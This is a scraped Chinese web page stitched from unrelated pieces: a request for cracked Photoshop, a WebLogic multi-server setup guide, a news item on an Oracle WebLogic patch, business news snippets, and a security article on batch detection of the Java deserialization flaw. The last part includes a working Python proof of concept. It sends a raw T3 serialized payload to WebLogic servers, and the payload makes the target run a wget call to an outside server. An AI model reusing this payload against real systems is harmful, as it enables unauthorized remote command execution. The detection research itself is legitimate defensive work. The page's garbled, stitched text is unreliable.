求个photoshop破解版,破解版免费的

weblogic服务器下一个domain建多个server(端口)
在weblogic
下建一个domin,常常需要建多个server(端口),例如建一个7001,一个8001的访问端口
它分为下面几个步骤:
&1&在domain下的Servers下新建一个server,指定IP和端口
&2&指定连接池到新建的server
&3&指定相应的web应用到新建的server
&4&修改原来的启动脚本,新建一个单独的启动脚本.
&1&在domain下的Servers下新建一个server,指定IP和端口
首先打开主页
配置完信息如下
点击Create按扭创建新的Server
&2&指定连接池到新建的server
首先点击JDBC&Connection Pools 创建一个新的连接
在最后选择Server时选择刚才新建的server
然后是新建Data Source
在选择Pool Name时选择刚才建的连接池
在最后选择Server时选择刚才新建的server
&3&指定相应的web应用到新建的server
&& 首先点击Web Application
Modules& 创建一个新的Web应用
然后找到你要部署的Web 应用
在最后选择Server时选择刚才新建的server
&4&修改原来的启动脚本,新建一个单独的启动脚本.
首选修改D:\bea\user_projects\domains\mydomain\startWebLogic.cmd
修改它的主server的内存使用到适合的范围,这样就可以把更多的内存提供给新的Server
然后新建一个启动脚本,内容如下
startManagedWebLogic.cmd NewServer
其中只需改变NewServer名字为你新建的Server名字,注意后面的为你的主Server的应用,不是你新的Server地址,请不要修改.
放到startWebLogic.cmd文件同目录下
最后启动startWebLogic.cmd,启动完毕再启动你的新脚本.
到此已经可以访问你的新Server下的应用了.
已投稿到:
以上网友发言只代表其个人观点,不代表新浪网的观点或立场。甲骨文紧急修复WebLogic严重安全漏洞-阿里云资讯网
甲骨文紧急修复WebLogic严重安全漏洞
发布时间:
更新时间:
来源:网络
作者:北京品纱
2月8日消息,在俄罗斯一位安全人员发布了这个安全漏洞的细节两个星期之后,甲骨文急忙发布了一个补丁修复其WebLogic应用服务器软件中的安全漏洞。  甲骨文说,这个安全漏洞存在于WebLogic的节点管理器软件中。一般来说,防火墙将封锁这个软件。然而,如果黑客能够访问节点管理器的管理端口,就会造成灾难性的后果。甲骨文在详细介绍这个安全漏洞的博客中说,成功地利用这个安全漏洞会全面攻破Windows平台上的目标服务器。在其它平台(Unix、Linux等)上,攻击者能够以WebLogic服务器进程相同的权限访问目标服务器。  甲骨文在1月12日发布了最新的补丁。这一次发布补丁显然是在安全公司Intevydis在1月23日公开这个安全漏洞细节之后不得不采取的行动。这家俄罗斯公司在1月份公布了十几个安全漏洞的细节,以便引起人们对于没有修复的大量的服务器和数据库安全漏洞的关注。  甲骨文发言人不愿意对这个安全补丁发表评论。甲骨文在安全警告中称,它强烈建议尽快使用补丁修复这个安全漏洞。这个安全漏洞影响WebLogic 7和以上版本的软件。  Intevydis首席执行官Evgeny Legerov说,他的公司不遵守提前通知厂商安全漏洞信息的标准的行业做法,因为这将使厂商免费利用安全研究人员做质量保证工作。  Legerov在星期五发表的电子邮件中证实,甲骨文没有提前得到这个安全漏洞的通知。因为我们的资源非常有限,我们不是为甲骨文工作的,我们不采取负责任的披露路线。  他解释说,这是一个严重的安全漏洞。远程攻击者不用任何身份识别就可以执行操作系统命令。  作者:天虹
本站所有文章全部来源于互联网,版权归属于原作者。本站所有转载文章言论不代表本站观点,如是侵犯了原作者的权利请发邮件联系站长(yanjing@),我们收到后立即删除。
当日送达服务
摘要: 据国外媒体报道,波士顿咨询公司(BCG)周二发布的最新报告显示,虽然同日送达服务已经成为电子商务领域最热门的趋势之一,但对于大多数美国消费者而言,这项服务过于昂贵,这使 & 据国外媒体报道,波士顿咨询公司(BCG)周二发布的最新报告显示,虽然同日送达服务已经成为电子商务领域最热门的趋势之一,但对于大多数美国消费者而言,这项服务过于昂贵,这使得同日送达有可能成为网购时代的又一...
摘要: 兵马未动,粮草先行。继2月21日为公司更名,并就年度计划、经营策略、组织架构、人员任命进行多项部署后,张近东在即将召开的2013年两会上也准备了充足的弹药。 张近东是全国政 兵马未动,粮草先行。继2月21日为公司更名,并就年度计划、经营策略、组织架构、人员任命进行多项部署后,张近东在即将召开的2013年两会上也准备了充足的“弹药”。 张近东是全国政协委员、苏宁云商集团股份有限公司(0...
在市场经济告诉发展的今天,因为互联网的诞生造就了很多的草根逆袭的人。互联网创业也已经成为一个时代的潮流,非常的的人借助互联网完成了自己的梦想,就拿东莞市末班车网络科技有限公司来说,就帮助了几万的普通职业者完成了人生华丽的转身。其CEO莫海军就是一个同过互联网创业的草根创业者,3年达到2.55亿的销售额,不的不说,这又是互联网创业实现的一个奇迹。 我们今天非常荣幸请到了东莞市末班车网络科技有限...
摘要: 尽管超极本问世已经两年多时间,但超极本市场一直都不温不火,这让一直唱多超极本的英特尔中国区总裁杨叙感到不轻松。 在日前于深圳举办的“第三届英特尔产业创新峰会”上,杨 &   尽管超极本问世已经两年多时间,但超极本市场一直都不温不火,这让一直唱多超极本的英特尔中国区总裁杨叙感到不轻松。   在日前于深圳举办的“第三届英特尔产业创新峰会”上,杨叙在接受南都记者专访时承认,超极本...
摘要: 尽管超极本问世已经两年多时间,但超极本市场一直都不温不火,这让一直唱多超极本的英特尔中国区总裁杨叙感到不轻松。 在日前于深圳举办的“第三届英特尔产业创新峰会”上,杨   尽管超极本问世已经两年多时间,但超极本市场一直都不温不火,这让一直唱多超极本的英特尔中国区总裁杨叙感到不轻松。   在日前于深圳举办的“第三届英特尔产业创新峰会”上,杨叙在接受南都记者专访时承认,超极本并没有取得预期...
摘要: 南都漫画:张建辉 新旧媒体在对抗中启动吸金磨盘 央视欲发力全媒体经营、人人网等社交阵营主打互动营销 伦敦奥运会已进入百日冲刺阶段倒计时100天,体育盛会的吸金磨盘再次转动 & & 南都漫画:张建辉 新旧媒体在对抗中启动吸金磨盘 央视欲发力全媒体经营、人人网等社交阵营主打“互动营销” 伦敦奥运会已进入“百日冲刺”阶段———倒计时100天,体育盛会的吸金磨盘再次转动。...
行业架构师咨询
服务与支持
账号与支持
关注阿里云
InternationalJava反序列化漏洞批量检测(附POC)_黑客技术
记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华
??本文?作者:魔方安全团队???前言??Java反序列漏洞出现在人们视野已经有一段时间了,魔方安全团队对这个漏洞进行了复现,同时研究出了一种准确性较高的批量检测的思路,在此与各位安全圈的朋友分享。??背景??日,FoxGlove Security安全团队的@breenmachine 发布的一篇博客中介绍了如何利用Java反序列化漏洞,来攻击最新版的WebLogic、WebSphere、JBoss、Jenkins、OpenNMS这些大名鼎鼎的Java应用,实现远程代码执行。其实早在2015年的1月28号,国外的安全研究员Gabriel Lawrence和Chris Frohoff在AppSecCali上给出了一个报告,报告中已经指出Java反序列化漏洞可以利用Apache Commons Collections这个常用的Java库来实现任意代码执行。??Java反序列漏洞简介??序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,类ObjectInputStream类的readObject()方法用于反序列化。下面是将字符串对象先进行序列化,存储到本地文件,然后再通过反序列化进行恢复的样例代码:public&static&void&main(String&args[])&throws&Exception&{String&obj&=&&hello&world!&;//&将序列化对象写入文件object.db中FileOutputStream&fos&=&new&FileOutputStream(&object.db&);ObjectOutputStream&os&=&new&ObjectOutputStream(fos);os.writeObject(obj);&os.close();&//&从文件object.db中读取数据FileInputStream&fis&=&new&FileInputStream(&object.db&);ObjectInputStream&ois&=&new&ObjectInputStream(fis);//&通过反序列化恢复对象obj&String&obj2&=&(String)ois.readObject();ois.close();}问题在于,如果Java应用对用户输入,即不可信数据做了反序列化处理,那么攻击者可以通过构造恶意输入,让反序列化产生非预期的对象,非预期的对象在产生过程中就有可能带来任意代码执行。所以这个问题的根源在于类ObjectInputStream在反序列化时,没有对生成的对象的类型做限制;假若反序列化可以设置Java类型的白名单,那么问题的影响就小了很多。本文针对该漏洞的原理将不再详细描述,可参考长亭科技在11月初发布针对该漏洞的详细原理介绍:漏洞检测检测用工具该漏洞的利用方法目前已经有成型的工具,其中包括国外研究者编写的,以及国内研究者编写的,均可以生成攻击payload。检测思路拓扑结构: & &&由于目前来说暂未发现可直接回显结果的方法,单纯检测包返回结果无法很精确的发现是否存在漏洞,因此我们采用了结合第三方的方式进行批量检查,检测服务器发送payload到受检测主机,受监测主机执行远程命令访问测试服务器打开的Web服务,登录测试服务器查看测试服务器的Web访问日志日志,确认受检测主机IP地址是否在日志文件上,测试服务器日志上存在受监测主机的IP地址,则可以确认受监测主机执行了命令,存在漏洞。 & & & & & & & & & &本次测试以使用最多的Weblogic为例,使用工具生成 payload ,payload中执行的命令为 wget&http://x.x.x.x/libreversex.html其中x.x.x.x为我们搭建用于接受wget命令的测试服务器的IP然后利用进行修改,在代码后面加入远程读取服务器日志,并匹配日志中是否存在该IP地址,其中读取目标服务器访问日志,我们使用了一个技巧,即将目标服务器的Web访问日志做个硬链接到Web目录下,这样就可以远程直接读取Web日志进行比对,确认该IP是否存在安全漏洞:运行结果:在批量检测过程中,我们发现并不是说仅有7001存在该安全漏洞,部分站点80端口也存在该漏洞,因为只要是接受T3协议的端口均会存在该安全漏洞。检测方法总结优点:该检测方法直接通过执行命令方式并查看执行结果的方式进行检测,准确率高。缺点:1. 若内网防火墙禁止内部主机主动访问外部,则无法成功检测,因此存在漏报的可能。2. 对于windows下的主机,由于无wget命令,无法使用该方式检测。检测用测试代码以下是WebLogic的POC,采用的BBT的框架:#!/usr/bin/env&python#&coding=utf-8&import&socketimport&sysimport&requestsimport&base64import&stringimport&urlparseimport&osimport&timeimport&requests&&from&baseframe&import&BaseFrame&class&MyPoc(BaseFrame):&&&&poc_info&=&{&&&&&&&&#&poc相关信息&&&&&&&&'poc':&{&&&&&&&&&&&&'id':&'poc-',&&&&&&&&&&&&'name':&'java反序列漏洞weblogic',&&&&&&&&&&&&'author':&'vicky',&&&&&&&&&&&&'create_date':&'',&&&&&&&&},&&&&&&&&#&协议相关信息&&&&&&&&'protocol':&{&&&&&&&&&&&&'name':&'*',&&&&&&&&&&&&'port':&['*'],&&&&&&&&&&&&'layer4_protocol':&['tcp'],&&&&&&&&},&&&&&&&&#&漏洞相关信息&&&&&&&&'vul':&{&&&&&&&&&&&&'app_name':&'java',&&&&&&&&&&&&'vul_version':&['*'],&&&&&&&&&&&&'type':&'远程命令执行',&&&&&&&&&&&&'tag':&['Java反序列漏洞',&'远程命令执行',&'weblogic'],&&&&&&&&&&&&'desc':&'''&&&&&&&&&&&&&&&&&&&&java&反序列漏洞使远程执行任意对象,配合weblogic中的Java反序列可使存在jenkins的系统远程执行命令&&&&&&&&&&&&&&&&&&&&''',&&&&&&&&&&&&'references':&['/_java_unserialize_rce/?from=timeline&isappinstalled=0#rdd',&&&&&&&&&&&&&&&&&&&&&&&&&&&],&&&&&&&&},&&&&}&&&&def&_init_user_parser(self):&&&&&&&&self.user_parser.add_option('-p','--port',&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&action='store',&dest='port',&type='int',&default=6379,&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&help='this&poc&need&the&port&to&connect&redis'&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&'the&default&port&is&6379.')&&&&&@classmethod&&&&def&verify(cls,&args):&&&&&&&&&ip=args['options']['target']&&&&&&&&port=args['options']['port']&&&&&&&&socket.setdefaulttimeout(5)&&&&&&&&payload='\x00\x00\x09\xfc\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'&&&&&&&&&try&:&&&&&&&&&&&&sock&=&socket.socket(socket.AF_INET,&socket.SOCK_STREAM)&&&&&&&&&&&&server_address&=&(ip,&int(port))&&&&&&&&&&&&headers='t3&12.2.1\nAS:255\nHL:19\nMS:\nPU:t3://us-l-breens:7001\n\n'&&&&&&&&&&&&sock.connect(server_address)&&&&&&&&&&&&sock.sendall(headers)&&&&&&&&&&&&data&=&sock.recv(1024)&&&&&&&&except&Exception,e:&&&&&&&&&&&&return&args&&&&&&&&if&&HELO&&in&data:&&&&&&&&&&&&try:&&&&&&&&&&&&&&&&payloadObj&=&open(“serial.wget”).read()&&&&&&&&&&&&&&&&payload=payload+payloadObj&&&&&&&&&&&&&&&&&&&&&&&&&&&&payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'&&&&&&&&&&&&&&&&sock.send(payload)&&&&&&&&&&&&&&&&time.sleep(10)&&&&&&&&&&&&&&&&data=requests.get('http://IP:PORT/log.log')&&&&&&&&&&&&&&&&if&data.content.count(str(ip))&&&0:&&&&&&&&&&&&&&&&&&&&&args['success']&=&True&&&&&&&&&&&&&&&&&&&&args['poc_ret']['ip']&=&ip&&&&&&&&&&&&&&&&&&&&args['poc_ret']['port']=&port&&&&&&&&&&&&except&Exception,e:&&&&&&&&&&&&&&&&return&args&&&&&&&&return&args&&&&exploit&=&verifyif&__name__&==&'__main__':&&&&from&pprint&import&pprint&&&&&mp&=&MyPoc()pprint(mp.run())参考资料:* 作者:CUBESEC Vicky,转载请注明来自FreeBuf黑客与极客()
阅读:54923 | 评论:0 | 标签:
想收藏或者和大家分享这篇好文章→
?微信扫一扫,快速掌握黑客技术?

我要回帖

更多关于 photoshop cs6破解版 的文章

 

随机推荐